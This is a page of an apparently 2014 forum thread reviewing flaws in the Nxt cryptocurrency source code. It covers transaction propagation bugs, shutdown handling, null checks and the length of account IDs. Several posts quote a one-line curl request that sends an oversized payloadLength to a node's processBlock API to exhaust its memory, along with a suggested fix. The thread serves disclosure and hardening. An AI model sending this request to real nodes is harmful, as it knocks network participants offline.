
Topic: Nxt source code flaw reports - page 35.

legendary
Activity: 2142
Merit: 1010
Newbie
January 07, 2014, 01:31:56 PM
The transaction is sent but rejected by peers because it's too far in the future. Adjust your time by minus 2 hours and check if you get any lost transactions.

What time do you mean? The time of the server on which the Nxt client is running?

The time of the machine the NRS server part runs on.
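
For reference, a minimal sketch of the kind of peer-side timestamp check being described (the constant name and the allowed drift are assumptions for illustration, not taken from the actual Nxt sources):

Code:
// Hypothetical sketch: peers drop transactions whose timestamp is too far ahead.
int curTime = getEpochTime(System.currentTimeMillis());
if (transaction.timestamp > curTime + MAX_TIMESTAMP_DRIFT) { // drift limit assumed

    // The transaction is silently discarded; the sender still gets an id back.
    return;

}

If the local clock is two hours fast, every transaction it signs lands beyond that window and is rejected by every peer.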
newbie
Activity: 50
Merit: 0
January 07, 2014, 01:30:00 PM
The transaction is sent but rejected by peers because it's too far in the future. Adjust your time by minus 2 hours and check if you get any lost transactions.

What time do you mean? The time of the server on which the Nxt client is running?
legendary
Activity: 2142
Merit: 1010
Newbie
January 07, 2014, 01:27:32 PM
I've been using the Nxt API for a small web project really often lately. I discovered that there is sometimes a problem with sending money. The transaction gets sent but does not show up in the Nxt network. Only a reboot of the Nxt client solves this problem.

When I use the API normally, it looks like the following: I send the sendMoney API call, it takes 5-10 seconds, and I get the transaction bytes and id back. But sometimes the sendMoney API call gets sent and 1-2 seconds later I get the transaction bytes and id back. That transaction never shows up in the network, even though I get an id and the bytes back AND I am connected to peers that are online. I can predict in advance whether a transaction will go through just by counting the seconds between the API call and the response.

I took a look at the code:

Code:
Transaction transaction = new Transaction(Transaction.TYPE_PAYMENT,
        Transaction.SUBTYPE_PAYMENT_ORDINARY_PAYMENT,
        getEpochTime(System.currentTimeMillis()), deadline, publicKey,
        recipient, amount, fee, referencedTransaction, new byte[64]);
transaction.sign(secretPhrase);

JSONObject peerRequest = new JSONObject();
peerRequest.put("requestType", "processTransactions");
JSONArray transactionsData = new JSONArray();
transactionsData.add(transaction.getJSONObject());
peerRequest.put("transactions", transactionsData);

Peer.sendToAllPeers(peerRequest);

response.put("transaction", convert(transaction.getId()));
response.put("bytes", convert(transaction.getBytes()));

Okay, the transaction gets built and signed, and the request gets created. This request is sent to all peers. In every case, even when there is a problem with sending the transaction to peers, I get the id and bytes back. So my script thinks: "No error, seems fine."

The question is: why do peers sometimes reject my transaction? Or is it a problem with the weight, so the whole thing never gets sent out? It would be great if the call could check whether the transaction really shows up in the network and otherwise return an error. sendToAllPeers is currently void. Could we change that to boolean and return true if the transaction was sent to at least one peer? Then the API call could check whether sendToAllPeers actually did something and otherwise return a proper error. The same goes for the web interface: it is really annoying when it says "Money is sent." but the transaction is lost.

The transaction is sent but rejected by peers because it's too far in the future. Adjust your time by minus 2 hours and check if you get any lost transactions.
newbie
Activity: 50
Merit: 0
January 07, 2014, 12:35:06 PM
I've been using the Nxt API for a small web project really often lately. I discovered that there is sometimes a problem with sending money. The transaction gets sent but does not show up in the Nxt network. Only a reboot of the Nxt client solves this problem.

When I use the API normally, it looks like the following: I send the sendMoney API call, it takes 5-10 seconds, and I get the transaction bytes and id back. But sometimes the sendMoney API call gets sent and 1-2 seconds later I get the transaction bytes and id back. That transaction never shows up in the network, even though I get an id and the bytes back AND I am connected to peers that are online. I can predict in advance whether a transaction will go through just by counting the seconds between the API call and the response.

I took a look at the code:

Code:
Transaction transaction = new Transaction(Transaction.TYPE_PAYMENT,
        Transaction.SUBTYPE_PAYMENT_ORDINARY_PAYMENT,
        getEpochTime(System.currentTimeMillis()), deadline, publicKey,
        recipient, amount, fee, referencedTransaction, new byte[64]);
transaction.sign(secretPhrase);

JSONObject peerRequest = new JSONObject();
peerRequest.put("requestType", "processTransactions");
JSONArray transactionsData = new JSONArray();
transactionsData.add(transaction.getJSONObject());
peerRequest.put("transactions", transactionsData);

Peer.sendToAllPeers(peerRequest);

response.put("transaction", convert(transaction.getId()));
response.put("bytes", convert(transaction.getBytes()));

Okay, the transaction gets built and signed, and the request gets created. This request is sent to all peers. In every case, even when there is a problem with sending the transaction to peers, I get the id and bytes back. So my script thinks: "No error, seems fine."

The question is: why do peers sometimes reject my transaction? Or is it a problem with the weight, so the whole thing never gets sent out? It would be great if the call could check whether the transaction really shows up in the network and otherwise return an error. sendToAllPeers is currently void. Could we change that to boolean and return true if the transaction was sent to at least one peer? Then the API call could check whether sendToAllPeers actually did something and otherwise return a proper error. The same goes for the web interface: it is really annoying when it says "Money is sent." but the transaction is lost. A rough sketch of the idea follows.
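
A minimal sketch of the suggested change (the peer collection and the Peer.send signature are assumptions based on the snippet above, not the actual Nxt sources):

Code:
// Hypothetical sketch: report whether the request reached at least one peer.
static boolean sendToAllPeers(JSONObject request) {

    boolean sentToAtLeastOnePeer = false;
    for (Peer peer : peers.values()) { // 'peers' collection assumed

        if (peer.send(request)) { // assume send() reports success

            sentToAtLeastOnePeer = true;

        }

    }
    return sentToAtLeastOnePeer;

}

// In the sendMoney handler:
if (Peer.sendToAllPeers(peerRequest)) {

    response.put("transaction", convert(transaction.getId()));
    response.put("bytes", convert(transaction.getBytes()));

} else {

    response.put("errorCode", 9); // hypothetical error code
    response.put("errorDescription", "Transaction was not sent to any peer");

}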
newbie
Activity: 11
Merit: 0
January 07, 2014, 11:22:59 AM
Hey gang,

Any thoughts on this?  https://nextcoin.org/index.php/topic,2418.0.html

Quote
When a POST is done with "processBlock", there is no sanity check on "payloadLength". This means an attacker could use this issue to DoS a node by keeping its heap exhausted all the time. This would trigger various OOM exceptions in other parts of the code.

Simple request causing 662.2 megs to be allocated:
curl "http://localhost:7874/nxt" -d '{"protocol": 1, "requestType": "processBlock", "version": 1, "blockTimestamp": 666, "timestamp": 666, "previousBlock": "666", "numberOfTransactions": 0, "totalAmount": 666, "totalFee": 1, "payloadLength": 662200000, "payloadHash": "deadbeef", "generatorPublicKey": "deadbeef", "generationSignature": "deadbeef", "blockSignature": "deadbeef"}'

* Tested against 0.5.0

Isn't this memory garbage collected?

Yes, the allocation will get garbage collected, but don't rely on that for this kind of operation. The solution is very easy here: there is a check that should be done against the max payload constant, and it is done, but too late, in a different function. As soon as you call 'processBlock', a first allocation occurs.

If I trigger this constantly on a node (say, localhost), any concurrent 'new' operation will fail with an OOM exception because memory is exhausted by this issue. That means I can easily DoS any node I want without using much bandwidth. An attacker could bring down the entire network using this trick. This is a critical issue.
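
A minimal sketch of the early check being described (the constant and helper names are assumptions for illustration; the actual Nxt sources may differ):

Code:
// Hypothetical sketch: validate payloadLength before any allocation happens.
int payloadLength = ((Long)request.get("payloadLength")).intValue();
if (payloadLength < 0 || payloadLength > MAX_PAYLOAD_LENGTH) {

    return errorResponse("Invalid payloadLength"); // reject before ByteBuffer.allocate(...)

}
ByteBuffer buffer = ByteBuffer.allocate(payloadLength);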

Nice catch... expect some tips!

I'm doing this to protect my investment... but thanks! That's always appreciated! ;)
full member
Activity: 168
Merit: 100
IDEX - LIVE Real-time DEX
January 07, 2014, 10:24:19 AM
Hey gang,

Any thoughts on this?  https://nextcoin.org/index.php/topic,2418.0.html

Quote
When a POST is done with "processBlock", there is no sanity check on "payloadLength". This means an attacker could use this issue to DoS a node by keeping its heap exhausted all the time. This would trigger various OOM exceptions in other parts of the code.

Simple request causing 662.2 megs to be allocated:
curl "http://localhost:7874/nxt" -d '{"protocol": 1, "requestType": "processBlock", "version": 1, "blockTimestamp": 666, "timestamp": 666, "previousBlock": "666", "numberOfTransactions": 0, "totalAmount": 666, "totalFee": 1, "payloadLength": 662200000, "payloadHash": "deadbeef", "generatorPublicKey": "deadbeef", "generationSignature": "deadbeef", "blockSignature": "deadbeef"}'

* Tested against 0.5.0

Isn't this memory garbage collected?

Yes, the allocation will get garbage collected, but don't rely on that for this kind of operation. The solution is very easy here: there is a check that should be done against the max payload constant, and it is done, but too late, in a different function. As soon as you call 'processBlock', a first allocation occurs.

If I trigger this constantly on a node (say, localhost), any concurrent 'new' operation will fail with an OOM exception because memory is exhausted by this issue. That means I can easily DoS any node I want without using much bandwidth. An attacker could bring down the entire network using this trick. This is a critical issue.

Nice catch... expect some tips!
legendary
Activity: 868
Merit: 1000
Cryptotalk.org - Get paid for every post!
January 07, 2014, 10:07:55 AM
Hey gang,

Any thoughts on this?  https://nextcoin.org/index.php/topic,2418.0.html

Quote
When a POST is done with "processBlock", there is no sanity check on "payloadLength". This means an attacker could use this issue to DoS a node by keeping its heap exhausted all the time. This would trigger various OOM exceptions in other parts of the code.

Simple request causing 662.2 megs to be allocated:
curl "http://localhost:7874/nxt" -d '{"protocol": 1, "requestType": "processBlock", "version": 1, "blockTimestamp": 666, "timestamp": 666, "previousBlock": "666", "numberOfTransactions": 0, "totalAmount": 666, "totalFee": 1, "payloadLength": 662200000, "payloadHash": "deadbeef", "generatorPublicKey": "deadbeef", "generationSignature": "deadbeef", "blockSignature": "deadbeef"}'

* Tested against 0.5.0

Isn't this memory garbage collected?

Wow! Famous last words of a novice Java programmer.
full member
Activity: 168
Merit: 100
IDEX - LIVE Real-time DEX
January 07, 2014, 09:59:06 AM
The fix is to call awaitTermination on the thread pools before calling Block.saveBlocks.
This has been fixed since 0.4.9e. Waiting up to 10 s, then shutdownNow.


Guess that's not what is killing 80% of my nodes. heh.
What exactly do you see happening, blocks.nxt corrupted?

On restart, the node gets stuck on the genesis block. I'll try some more with the new release.
legendary
Activity: 1181
Merit: 1002
January 07, 2014, 09:40:47 AM
An attacker could bring down the entire network using this trick. This is a critical issue.
+1.

Actually, even a not very talented one could do it: request all peers, make a list, and issue the requests... (even I might have a chance -> fix needed urgently ;) )
hero member
Activity: 834
Merit: 524
Nxt NEM
January 07, 2014, 09:34:00 AM
An attacker could bring down the entire network using this trick. This is a critical issue.
+1.

Hopefully that (a DDoS or something else...) is not happening now.
https://nextcoin.org/index.php/topic,2525.msg25258.html#msg25258
Slowness and negative balances...
hero member
Activity: 784
Merit: 501
January 07, 2014, 09:24:53 AM
An attacker could bring down the entire network using this trick. This is a critical issue.
+1.
newbie
Activity: 11
Merit: 0
January 07, 2014, 08:52:00 AM
Hey gang,

Any thoughts on this?  https://nextcoin.org/index.php/topic,2418.0.html

Quote
When a POST is done with "processBlock", there is no sanity check on "payloadLength". This means an attacker could use this issue to DoS a node by keeping its heap exhausted all the time. This would trigger various OOM exceptions in other parts of the code.

Simple request causing 662.2 megs to be allocated:
curl "http://localhost:7874/nxt" -d '{"protocol": 1, "requestType": "processBlock", "version": 1, "blockTimestamp": 666, "timestamp": 666, "previousBlock": "666", "numberOfTransactions": 0, "totalAmount": 666, "totalFee": 1, "payloadLength": 662200000, "payloadHash": "deadbeef", "generatorPublicKey": "deadbeef", "generationSignature": "deadbeef", "blockSignature": "deadbeef"}'

* Tested against 0.5.0

Isn't this memory garbage collected?

Yes, the allocation will get garbage collected, but don't rely on that for this kind of operation. The solution is very easy here: there is a check that should be done against the max payload constant, and it is done, but too late, in a different function. As soon as you call 'processBlock', a first allocation occurs.

If I trigger this constantly on a node (say, localhost), any concurrent 'new' operation will fail with an OOM exception because memory is exhausted by this issue. That means I can easily DoS any node I want without using much bandwidth. An attacker could bring down the entire network using this trick. This is a critical issue.
legendary
Activity: 2142
Merit: 1010
Newbie
January 07, 2014, 08:33:49 AM
Quote
All 256 bits are checked after the very first outgoing transaction is made.

They are not checked in unblock account.

It doesn't matter. An adversary is still unable to spend the coins; the ledger is public anyway.


I guess I was wrong about the first 64 bits not being cryptographically secure, but we're still talking about 64 bits.

I still have not heard an answer as to why NXT isn't using (at least) 160-bit hashes like Bitcoin.

https://bitcointalksearch.org/topic/m.4352067
legendary
Activity: 2142
Merit: 1010
Newbie
January 07, 2014, 08:30:47 AM
There aren't any ASICs implementing Curve25519 yet :). What if someone decides to implement one? Does that change your analysis?

They should hurry up, 11 months left.


Also, there's the potential for a rogue actor to claim all unopened NXT accounts by trying 2^64 secret phrases, preventing the network from creating any new accounts.

It's impossible. He must spend at least 2^57 NXT for that.
sr. member
Activity: 299
Merit: 250
January 07, 2014, 08:28:05 AM
Quote
All 256 bits are checked after the very first outgoing transaction is made.

They are not checked in unblock account.

Quote
Note that SHA-224 is not a simple truncated version of SHA-256: the IV is different. SHA-224 is computed like SHA-256 and then truncated, but as the IV is different, the intermediate 256 bit result of SHA-224 is totally different (in general) than the SHA-256 computation. The same goes for SHA-384 vs SHA-512.
- http://crypto.stackexchange.com/questions/9435/is-truncating-a-sha512-hash-to-the-first-40-characters-as-secure-as-using-sha1

I guess I was wrong about the first 64 bits not being cryptographically secure, but we're still talking about 64 bits.

I still have not heard an answer as to why NXT isn't using (at least) 160-bit hashes like Bitcoin.
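
For context, a Nxt account number is derived from the first 64 bits of the SHA-256 hash of the account's public key. A sketch of that derivation (not the literal Nxt code, which assembles the id byte by byte):

Code:
// Sketch: derive the 64-bit account id from a public key.
byte[] publicKeyHash = MessageDigest.getInstance("SHA-256").digest(publicKey);
// First 8 bytes of the hash, interpreted in little-endian order.
long accountId = ByteBuffer.wrap(publicKeyHash).order(ByteOrder.LITTLE_ENDIAN).getLong();

A collision only needs to match those 64 bits, which is why the comparison with Bitcoin's 160-bit address hashes keeps coming up.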
legendary
Activity: 2142
Merit: 1010
Newbie
January 07, 2014, 08:27:35 AM
You have to think like an attacker. They can do this by producing otherwise-valid blocks with high difficulties to knock out most of the network.

What do you mean?
sr. member
Activity: 299
Merit: 250
January 07, 2014, 08:25:12 AM
All 256 bits are checked after the very first outgoing transaction is made.
This is not a solution IMO. 2^64 is "only" 18446744073709551616 addresses. If it isn't already possible, it isn't going to take many years for someone to gain the ability to brute-force and store keys to all of these addresses and automatically empty any "new" Nxt account whenever it's "made".

Unless of course I'm missing something. Do tell if I am.

Difficulty to hack any of such accounts ~ 2^71/numberOfAccounts SHA256 operations.

Edit: You can't compare this to the Bitcoin network because there are no ASICs implementing Curve25519 yet.

There aren't any ASICs implementing Curve25519 yet :). What if someone decides to implement one? Does that change your analysis?

Also, there's the potential for a rogue actor to claim all unopened NXT accounts by trying 2^64 secret phrases, preventing the network from creating any new accounts.
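
Taking the ~2^71 figure above at face value, a quick worked example (my arithmetic, not from the posts): with 2^20 existing accounts, hitting any one of them would still take about 2^71 / 2^20 = 2^51 SHA256 evaluations.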
sr. member
Activity: 299
Merit: 250
January 07, 2014, 08:13:00 AM
Quote
1. They'll be unblacklisted after a short period of time.

Right, but the fact that they get blacklisted for any amount of time would make the network more vulnerable for that period of time.

Quote
2. They can't do that without providing valid blocks or being blacklisted.

You have to think like an attacker. They can do this by producing otherwise-valid blocks with high difficulties to knock out most of the network.
sr. member
Activity: 392
Merit: 250
January 07, 2014, 06:44:21 AM
The fix is to call awaitTermination on the thread pools before calling Block.saveBlocks.
This has been fixed since 0.4.9e. Waiting up to 10 s, then shutdownNow.


Guess that's not what is killing 80% of my nodes. heh.
What exactly do you see happening, blocks.nxt corrupted?
The code now is:
Code:
        scheduledThreadPool.shutdown();
        try {
            scheduledThreadPool.awaitTermination(10, TimeUnit.SECONDS);
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        }
        if (! scheduledThreadPool.isTerminated()) {
            logMessage("some threads didn't terminate, forcing shutdown");
            scheduledThreadPool.shutdownNow();
        }

        try {

            Block.saveBlocks("blocks.nxt", true);

        } catch (Exception e) {
            logMessage("error saving blocks.nxt");
        }

        try {

            Transaction.saveTransactions("transactions.nxt");

        } catch (Exception e) {
            logMessage("error saving transactions.nxt");
        }

        logMessage("Nxt stopped.");
If any thread didn't finish successfully, you will see the "some threads didn't terminate..." message. But even so, they are then terminated forcefully before trying to save blocks.nxt, so they shouldn't interfere.
I know, one could save to a temporary file and then rename it. I don't want to get into Unix vs. Windows file-delete differences. Besides, the plan is to move away from saving serialized objects to a file eventually.
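
For what it's worth, a sketch of that temp-file-then-rename approach (the 'blocks' object and file names follow the snippet above; whether the move is actually atomic depends on the OS and filesystem, which is exactly the portability concern mentioned):

Code:
// Sketch: write to a temporary file, then move it over the real one.
Path tmp = Paths.get("blocks.nxt.tmp");
try (ObjectOutputStream out = new ObjectOutputStream(Files.newOutputStream(tmp))) {

    out.writeObject(blocks);

}
Files.move(tmp, Paths.get("blocks.nxt"), StandardCopyOption.ATOMIC_MOVE);

If the process dies mid-write, the old blocks.nxt is still intact.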
hero member
Activity: 834
Merit: 524
Nxt NEM
January 07, 2014, 06:06:22 AM
Some minor findings and questions about the sources, without any running or debugging.
They are on "// " lines... possibly they don't have any effect on the program's execution ;-)

Code:
		
synchronized (Nxt.transactions) {

    // If it doesn't break any logic, a loop that removes items is better started from the end.
    // Not sure about Java and this code, but some programs can hit critical problems
    // if removing causes a kind of skipping over every second item.
    for (int i = block.numberOfTransactions - 1; i >= 0; i--) {
    //for (int i = 0; i < block.numberOfTransactions; i++) {

        Transaction transaction = Nxt.transactions.remove(block.transactions[i]);
        unconfirmedTransactions.put(block.transactions[i], transaction);

        Account senderAccount = accounts.get(Account.getId(transaction.senderPublicKey));
        // check if null?
        synchronized (senderAccount) {

            senderAccount.setBalance(senderAccount.balance + (transaction.amount + transaction.fee) * 100L);

        }



----------------------------

block.blockSignature = Crypto.sign(data2, secretPhrase);

// Move these two lines inside the if block:
//     JSONObject request = block.getJSONObject(newTransactions);
//     request.put("requestType", "processBlock");
// The same could be done e.g. in 'case "sendMoney":', etc.

if (block.verifyBlockSignature() && block.verifyGenerationSignature()) {

    JSONObject request = block.getJSONObject(newTransactions);   // moved here
    request.put("requestType", "processBlock");

    Peer.sendToAllPeers(request);

} else {


--------------------

synchronized (Nxt.transactions) {

    for (int i = 0; i < numberOfTransactions; i++) {

        Transaction transaction = Nxt.transactions.get(transactions[i]);

        long sender = Account.getId(transaction.senderPublicKey);
        Account senderAccount = accounts.get(sender);
        // check if (senderAccount == null)?

        synchronized (senderAccount) {


-------------------




long twofoldCurBaseTarget = curBaseTarget * 2;
if (twofoldCurBaseTarget < 0) {

    // also check this? twofoldCurBaseTarget > maxBaseTarget
    twofoldCurBaseTarget = maxBaseTarget;

}

if (newBaseTarget > twofoldCurBaseTarget) {


------------------



byte[] getBytes() {

    ByteBuffer buffer = ByteBuffer.allocate(4 + 4 + 8 + 4 + 4 + 4 + 4 + 32 + 32 + 64 + 64);
    // Does Java take care of low-memory or allocation errors? No need to check?



------------




Account account = accounts.get(Account.getId(generatorPublicKey));
if (account == null || account.getEffectiveBalance() == 0) {

    return false;

}

int elapsedTime = timestamp - previousBlock.timestamp;

// does target get effectively random numbers here? Any test results from N*1000 runs?
BigInteger target = BigInteger.valueOf(Block.getBaseTarget())
        .multiply(BigInteger.valueOf(account.getEffectiveBalance()))
        .multiply(BigInteger.valueOf(elapsedTime));
byte[] generationSignatureHash = MessageDigest.getInstance("SHA-256").digest(generationSignature);

--------------------------



int getWeight() {

    // ...

    // if balance < 100, should the result be 0?
    return (int)(adjustedWeight * (account.balance / 100) / 1000000000);



-------------------------



for (i = 0; i < numberOfBlocks; i++) {

    JSONObject blockData = (JSONObject)nextBlocks.get(i);
    Block block = Block.getBlock(blockData);
    // what if block is null?
    curBlockId = block.getId();


----------------------------



synchronized (blocks) {

    long blockId = lastBlock;
    int height = Block.getLastBlock().height;
    int numberOfBlocks = 0;
    while (numberOfBlocks < 60) {

        // can height become negative in this loop?
        numberOfBlocks++;

        Block block = blocks.get(blockId);



-----------------------------




